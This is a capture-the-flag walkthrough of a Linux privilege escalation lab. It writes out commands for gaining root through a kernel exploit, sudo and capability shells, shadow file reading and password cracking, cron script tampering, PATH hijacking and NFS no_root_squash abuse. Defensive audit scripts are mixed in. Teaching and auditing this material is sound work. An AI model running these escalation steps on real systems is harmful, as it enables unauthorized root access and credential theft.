Linux Privilege Escalation

The document provides a comprehensive overview of privilege escalation, detailing its definition, types (vertical and horizontal), and importance in cybersecurity. It includes tasks and solutions for enumerating system information, exploiting vulnerabilities, and utilizing automated tools for privilege escalation on a Linux system. The document also covers various methods to gain root access, including kernel exploits, sudo rights, SUID binaries, capabilities, cron jobs, and NFS shares.

Task 1 (Introduction)

This task gives us introductory information about Privilege Escalation and what to do in this room.

Question:

Read the above.

No answer needed

Task 2 (What is Privilege Escalation?)
What does “privilege escalation” mean?

Privilege Escalation usually involves going from a lower permission account to a higher permission one. More technically, it is the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from users.

There are 2 types of Privilege Escalation: Vertical and Horizontal Privilege Escalation.

Vertical Privilege Escalation:

• Vertical privilege escalation involves gaining higher levels of access within the same system or environment. For example, if a user starts with regular user privileges and manages to elevate their access to an administrator or root level, it is considered vertical privilege escalation.

Horizontal Privilege Escalation:

• Horizontal privilege escalation, on the other hand, involves gaining the same level of access but on a different account or user. In this scenario, an attacker with standard user privileges aims to compromise another user's account with similar privileges.

Why is it important?

It's rare when performing a real-world penetration test to be able to gain a foothold (initial access) that gives you direct administrative access. Privilege escalation is crucial because it lets you gain system administrator levels of access, which allows you to perform actions such as:

• Resetting passwords
• Bypassing access controls to compromise protected data
• Editing software configurations
• Enabling persistence
• Changing the privilege of existing (or new) users
• Executing any administrative command

Question:

Read the above.

no answer needed.

Task 3 (Enumeration)
Questions:

1. What is the hostname of the target system?


Solution No1

• We just use the hostname command to learn the hostname of the target system. The hostname command returns the hostname of the target machine.

Solution No2

• We can also use the uname command to learn information about the target machine. This command has multiple options:
uname --help #shows command options and usage

uname -n #print the network node hostname

Solution No3

• When you are in a system and only see $ in the terminal, you can use this trick:
bash -i

• This command gives us an interactive shell, and we can see the username and hostname of the target machine.

Answer: wade7363

2. What is the Linux kernel version of the target system?

Solution No1

• Again we use the uname command, this time with the -r option, to learn the kernel version of the target machine.
uname -r #print the kernel release

Answer: 3.13.0-24-generic

3. What Linux is this?

Solution No1

• We use the lsb_release command to learn the Linux distribution and version of the target machine.
lsb_release -d #show the description of this distribution

lsb_release -a #show all of the above information

Solution No2

• The Linux version is also stored in the issue file in the etc folder. If we read the issue file using the cat command, we can find out the Linux version of this machine.
cat /etc/issue

Answer: Ubuntu 14.04 LTS

4. What version of the Python language is installed on the system?

Solution
• If we want to know the version of python or any other program or tool, we simply use the --version option in Linux:
<command or program> --version

python --version

Answer: 2.7.6

5. What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)

CVE (Common Vulnerabilities and Exposures) is a program that identifies, defines, and catalogs publicly disclosed cybersecurity vulnerabilities. Each vulnerability is assigned a unique CVE ID number. These IDs are used to reference specific security flaws in various software applications or libraries.

Solution

• To find the CVE number, we go to exploit-db.com and search for the Linux kernel version on this site.

• Exploit-db is also preinstalled in Kali Linux; you simply search in your terminal with the tool called searchsploit:
searchsploit <version or name of service>

searchsploit 3.13.0
Answer: CVE-2015-1328

Task 4 (Automated Enumeration Tools)
This task shows links to enumeration tools that will make our work easier. Using them will help us save time; don't be shy, use all of them until you find your favorite.

Question:

Install and try a few automated enumeration tools on your local Linux
distribution

no answer needed.

Task 5 (Privilege Escalation: Kernel Exploits)
Questions:

1. Find and use the appropriate kernel exploit to gain root privileges on the target system.

Solution

• First, as in the previous task, we search for an exploit corresponding to the kernel version of our Linux on the exploit-db.com website. In the previous task we used the searchsploit command to find our payload; now we use the -m option to copy the payload to our current directory.
searchsploit <kernel version of the target>

searchsploit -m <payload name> #Mirror (aka copies) an exploit to the current working directory

• Now we need to send this payload to the target machine. To do this we use a python web server and the wget command:
python3 -m http.server <port is optional> #when you don't give a port, the server starts on the default port 8000

ifconfig tun0 #this command shows your VPN ip address

• To send this payload to the target machine, we go to /tmp on the target and use the wget command to download our payload file:
wget http://<VPN IP>:<port>/<name of the file>

wget http://10.8.95.15:8080/37292.c

• Then we need a compiler to build the downloaded C file. We use the gcc command to compile it:
gcc -static <C file> -o <filename>

gcc -static 37292.c -o exploit

./exploit #to run the program

and now we are root!

no answer needed.

2. What is the content of the flag1.txt file?

Solution

• By default, user home directories are stored in the /home folder in Linux. Then we can read the content of the flag1.txt file using the cat command.
Note: when you get root or get a shell, it can be difficult to use that shell. This trick is for you: use the export command to set the terminal type in the shell environment.
export TERM=xterm

Task 6 (Privilege Escalation: Sudo)
Questions :

1. How many programs can the user “karen” run on the target
system with sudo rights?

Solution

• In this task, we need to use the sudo -l command to find out how many programs the user karen can run on the target system.
sudo -l #this command lists the commands the current user may run as root with sudo
Answer: 3

2. What is the content of the flag2.txt file?

Solution No1

• In this task we need to be root to read the flag2.txt file. First we go to the gtfobins website and learn how to run these commands as root. We will use the less command to get root:
sudo less <file to read>

!/bin/bash

Solution No2

• In this task we see other commands that we have permission to run as root; one of them is the find command:
sudo find . -exec /bin/sh \; -quit
• To find the location of flag2.txt we again use the find command:
find / -name flag2.txt 2>/dev/null

3. How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

Solution

• In this task, we go to our favorite site gtfobins again and search for the sudo usage of the nmap command.
• Here we have 2 options, but we go with the easy one:
sudo nmap --interactive
nmap> !sh

Answer: sudo nmap --interactive

4. What is the hash of frank's password?

Solution

• In this task we need the frank user's password hash. In Linux, users' password hashes are stored in the /etc/shadow file, so we simply read /etc/shadow; as in the previous task, we use the less command:
sudo less /etc/shadow

Task 7 (Privilege Escalation: SUID)
Questions :

1. Which user shares the name of a great comic book writer?

Solution
• We need to look at the passwd file to see the users. We can read the passwd file in the etc directory using the cat command:
cat /etc/passwd

2. What is the password of user2?

Solution

• First we take a look at the files with SUID permissions using the find command:
find / -type f -perm -04000 -ls 2>/dev/null
• To crack a user's password, we need to create a file by merging the passwd and shadow files with the unshadow command. We can read the passwd file, but we are not allowed to read the shadow file. However, we see that the base64 binary has the SUID bit set, so we can use base64 to read it: we first encode the file with base64, then decode the output with base64 -d and read it.
/usr/bin/base64 /etc/shadow | /usr/bin/base64 -d
To create the unshadowed file we copy the passwd and shadow contents into separate files and use the unshadow command:
unshadow passwd shadow | tee cracked

We use the JohnTheRipper tool to crack the users' passwords with the rockyou.txt wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt cracked
3. What is the content of the flag3.txt file?

Solution

• First we switch to user2 with the password we cracked. Then we look for the flag3.txt file with the find command.
su user2 #use the password previously cracked

find / -name flag3.txt 2>/dev/null #to find the flag3.txt location

• After finding it, we read it using the base64 command, as in the previous task.
/usr/bin/base64 /home/ubuntu/flag3.txt | /usr/bin/base64 -d

Task 8 (Privilege Escalation: Capabilities)
Questions :

1. Complete the task described above on the target system.

Solution No1 :
• Let's see how to become root using capabilities. First, let's use the command getcap -r / 2>/dev/null to see which binaries have capabilities set.
getcap -r / 2>/dev/null

• There are 6 commands that have capabilities set. We first look at the vim command: search for it on gtfobins and select capabilities.
./vim -c ':python import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

#check the python version

Solution No2

• The second command is view, which also has a capability set. We search for it on gtfobins and select capabilities.
./view -c ':python import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

#check the python version

no answer needed.

2. How many binaries have set capabilities?

Solution

• To see this, we use the getcap -r / 2>/dev/null command from the previous task.
getcap -r / 2>/dev/null

Answer: 6

3. What other binary can be used through its capabilities?

Solution :

• Among the binaries with capabilities set, two can be used this way: vim and view.
Answer: view

4. What is the content of the flag4.txt file?

Solution

• To find flag4.txt we use the find command as in our previous task:
find / -name flag4.txt 2>/dev/null
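The two enumeration steps above (the SUID listing from Task 7 and the getcap output from this task) are exactly what a defender should review on every host. The following audit is an added example, not part of the original write-up: it parses the text output of the two commands, flags SUID binaries missing from an assumed Ubuntu baseline (EXPECTED_SUID is an assumption; tune it per image) and flags capabilities such as cap_setuid that let a binary become root.

```python
"""Audit SUID binaries and file capabilities against a baseline (added
example, not from the original write-up). Parses the text output of
`find / -type f -perm -04000 -ls` and `getcap -r /`; EXPECTED_SUID is an
assumed baseline for a minimal Ubuntu host, so tune it per image."""
import re
# Assumed baseline of SUID binaries normally present on Ubuntu.
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
}
# Capabilities that let a process become root or bypass file permissions.
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace"}

def unexpected_suid(find_ls_output):
    """Return SUID paths from `find -ls` lines that are not in the baseline."""
    found = []
    for line in find_ls_output.splitlines():
        fields = line.split()
        # find -ls columns: inode blocks perms links user group size mon day year path
        if len(fields) >= 11 and fields[10] not in EXPECTED_SUID:
            found.append(fields[10])
    return found

def risky_capabilities(getcap_output):
    """Return (path, sorted caps) for binaries carrying a dangerous capability.
    Accepts both `path = cap_x+ep` (older libcap) and `path cap_x=ep` lines."""
    risky = []
    for line in getcap_output.splitlines():
        path, _, rest = line.strip().partition(" ")
        hits = sorted(set(re.findall(r"cap_[a-z_]+", rest)) & DANGEROUS_CAPS)
        if path and hits:
            risky.append((path, hits))
    return risky

# Constructed sample output (not captured from the target machine).
SAMPLE_FIND = """\
  1234  56 -rwsr-xr-x   1 root  root   55528 Feb  3  2020 /usr/bin/passwd
  2345  44 -rwsr-xr-x   1 root  root   43352 Sep  5  2019 /usr/bin/base64
"""
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/home/ubuntu/view = cap_setuid+ep
/usr/bin/vim cap_setuid=ep
"""

if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(SAMPLE_FIND))   # ['/usr/bin/base64']
    print("risky caps:", risky_capabilities(SAMPLE_GETCAP))
```

On a live host, pipe the real command output into the two functions (for example via subprocess.run) and compare the result against the previous run to catch a newly added SUID bit or capability.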

Task 9 (Privilege Escalation: Cron Jobs)
Questions :

1. How many user-defined cron jobs can you see on the target
system?

Solution

• We need to read the crontab file in the etc folder with the cat command.
cat /etc/crontab
Answer: 4

2. What is the content of the flag5.txt file?

Solution

• For our first method we use the backup.sh file to gain root; for this we use the SUID permission. We need to be root to read the flag5.txt file. We see that we have an sh file that is automatically run every minute. To become root, we just need to change the contents of the backup.sh file using the nano backup.sh command.
nano backup.sh

• We just need to give SUID permission to /bin/bash; then we can run it and become root. We use the chmod command to give the SUID permission:
#!/bin/bash
chmod u+s /bin/bash #u+s is used to give SUID permission

After we edit the backup.sh file we give it all permissions with the chmod command; after that we simply use the /bin/bash -p command to gain root.
chmod 777 backup.sh

/bin/bash -p
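The root cause above is a root cron job whose script is writable by an unprivileged user. The audit below is an added example, not part of the original write-up: it parses /etc/crontab-style text and reports root jobs whose absolute script path is missing (whoever creates it gets root execution) or is not root-owned or group/world writable. The stat lookup is injected so the check runs on constructed data here.

```python
"""Audit /etc/crontab for root jobs whose script a non-root user can create or
edit (added example, not from the original write-up). The stat lookup is injected
so it runs on constructed data; live: lambda p: os.stat(p) if os.path.exists(p) else None."""
import stat

def parse_system_crontab(text):
    """Return (user, command) pairs; skips comments, blanks and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        # @reboot/@hourly entries have one schedule field, normal ones have five
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) == (3 if line.startswith("@") else 7):
            jobs.append((parts[-2], parts[-1]))
    return jobs

def risky_root_jobs(crontab_text, stat_of):
    """Return (command, reason) for root jobs whose absolute script path is
    missing, not root-owned, or group/world writable."""
    risky = []
    for user, command in parse_system_crontab(crontab_text):
        script = command.split()[0]
        if user != "root" or not script.startswith("/"):
            continue  # relative names resolve via cron's own PATH; out of scope here
        st = stat_of(script)
        if st is None:
            risky.append((command, "missing: whoever creates it runs as root"))
        elif st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append((command, "writable by non-root"))
    return risky

# Constructed sample crontab and fake stat results (not from the target).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
* * * * *  root  /home/karen/backup.sh
* * * * *  root  /tmp/overwrite.sh
* * * * *  root  /usr/local/bin/cleanup.sh
@reboot    karen /home/karen/notes.sh
"""
class FakeStat:
    def __init__(self, uid, mode):
        self.st_uid, self.st_mode = uid, mode
SAMPLE_FS = {
    "/home/karen/backup.sh": FakeStat(0, 0o100777),     # root-owned, world-writable
    "/usr/local/bin/cleanup.sh": FakeStat(0, 0o100755),  # root-owned, 755: fine
}
```

Run risky_root_jobs(SAMPLE_CRONTAB, SAMPLE_FS.get) to see the two findings; the fix for each is the same: root-owned script, mode 755 or stricter, in a directory only root can write.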

3. What is Matt’s password?

Solution

We copy matt's passwd and shadow entries to our host machine and, as in the previous task, use the unshadow command and JohnTheRipper to crack the password.
grep matt /etc/shadow

grep matt /etc/passwd

unshadow passwd shadow | tee Password

john --wordlist=/usr/share/wordlists/rockyou.txt Password
Task 10 (Privilege Escalation: PATH)
Questions :

1. What is the odd folder you have write access for?

solution :

• To find out we need to use the command find / -writable 2>/dev/null.

Answer: /home/murdoch

2. Exploit the $PATH vulnerability to read the content of the flag6.txt file.

Solution

• First of all, to become root, we need to go to the tmp folder, create a file called thm, and write /bin/bash into it. Then we make it executable, put /tmp at the front of PATH, and run the test binary in /home/murdoch.
echo "/bin/bash" > thm

chmod 777 thm

export PATH=/tmp:$PATH
cd /home/murdoch

./test

no answer needed.

3. What is the content of the flag6.txt file?

Solution

• We use the find command to locate flag6.txt and the cat command to read its content:
find / -name flag6.txt 2>/dev/null

Task 11 (Privilege Escalation: NFS)
Questions

1. How many mountable shares can you identify on the target system?

Solution :

• To find out, we need to use the showmount command.
showmount -e <Target Machine IP address>

Answer: 3

2. How many shares have the “no_root_squash” option enabled?

Solution

• Here we need to read the exports file in the etc folder using the cat command.
cat /etc/exports

Answer: 3
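Counting no_root_squash entries by eye works for a three-line file; on a real server you want the check scripted. The parser below is an added example, not part of the original write-up: it reads /etc/exports text (comments, backslash continuations and several clients per line included) and lists the paths that at least one client can mount with no_root_squash, which is the setting that lets a remote root keep uid 0 on the share. The sample file is constructed.

```python
"""Parse /etc/exports and flag shares exported with no_root_squash (added
example, not from the original write-up). With root_squash, the default, a
remote root is mapped to nobody, so a SUID-root file dropped on the share has
no effect; no_root_squash keeps remote root as uid 0 on the server."""
import re

def parse_exports(text):
    """Return (path, client, [options]) tuples from /etc/exports text.
    Handles comments, backslash line continuations and several clients per line."""
    entries = []
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:       # bare path: exported to everyone
            m = re.fullmatch(r"([^()]*)(?:\((.*)\))?", client)
            if not m:
                continue
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append((path, m.group(1) or "*", opts))
    return entries

def no_root_squash_shares(text):
    """Paths that at least one client can mount with no_root_squash."""
    found = []
    for path, _client, opts in parse_exports(text):
        if "no_root_squash" in opts and path not in found:
            found.append(path)
    return found

# Constructed sample (not the target's real exports file).
SAMPLE_EXPORTS = """\
# /etc/exports: constructed sample
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public 10.0.0.0/24(ro,sync) \\
    192.168.1.5(rw,sync)
"""

if __name__ == "__main__":
    print("shares:", sorted({p for p, _, _ in parse_exports(SAMPLE_EXPORTS)}))
    print("no_root_squash:", no_root_squash_shares(SAMPLE_EXPORTS))
```

Removing no_root_squash (or adding root_squash explicitly) and re-running exportfs -ra is the fix; the function returning an empty list is the check that it took effect.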

3. Gain a root shell on the target system

Solution

• First we create a connection between the two machines using the following commands. With the mount command, I create a connection between the backdoor folder on my machine and the sharedfolder folder on the victim's machine.
• Then, in the backdoor folder we created on our machine, we either copy a bash binary there and set the SUID bit on it, or create a C file and write the C code given to us in the task.
#Our Host machine
mkdir /tmp/backdoor
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/backdoor
cd /tmp/backdoor
cp /bin/bash .
chmod +s bash

#Target Machine
cd <SHARED_FOLDER>
./bash -p #ROOT shell

• For the C file variant, we first compile the code by typing gcc -static nfs.c -o nfs.

• Then we give SUID permission to the nfs file:
chmod +s nfs

• Now we go to the sharedfolder folder on the victim machine and run ./nfs to execute this code and become root.

No answer needed

4. What is the content of the flag7.txt file?

Solution :

Now we find and read the flag7.txt file:
find / -name flag7.txt 2>/dev/null
/home/matt/flag7.txt
cat /home/matt/flag7.txt

no answer needed.

Task 12 (Capstone Challenge)

Questions :

1. What is the content of the flag1.txt file?

Solution :

• First, we need to see what has SUID permissions so we know which commands we can run as root. We find this with the command find / -type f -perm -04000 -ls 2>/dev/null.

• We see that the base64 command has SUID permissions, so as in the previous task, we can encode the shadow file with the base64 command and then decode and read it.
/usr/bin/base64 /etc/shadow | /usr/bin/base64 -d

• Then we create passwd and shadow files in the tmp folder on our machine. We copy the passwd and shadow contents from the victim's machine there. We then create a hash file from them using the unshadow command.
unshadow passwd shadow | tee hash

• We then use the john command to crack the passwords.

• Here we see that the password for the missy user is Password1. We can now log in as the missy user.
su missy
Password: Password1

• Then we find and read the flag1.txt file.
find / -name flag1.txt 2>/dev/null

base64 /home/missy/Documents/flag1.txt | base64 -d

2. What is the content of the flag2.txt file?

Solution :

• Now we need to be root to read flag2.txt. First, let's see which commands we can run as root without being root by typing sudo -l.

• We see that we can use the find command! Now let's go to gtfobins and see how we can become root using the find command.

• Now we can become root just by typing this command:
sudo find . -exec /bin/sh \; -quit

• Now we just need to find and read the flag2.txt file.
find / -name flag2.txt 2>/dev/null

cat flag2.txt
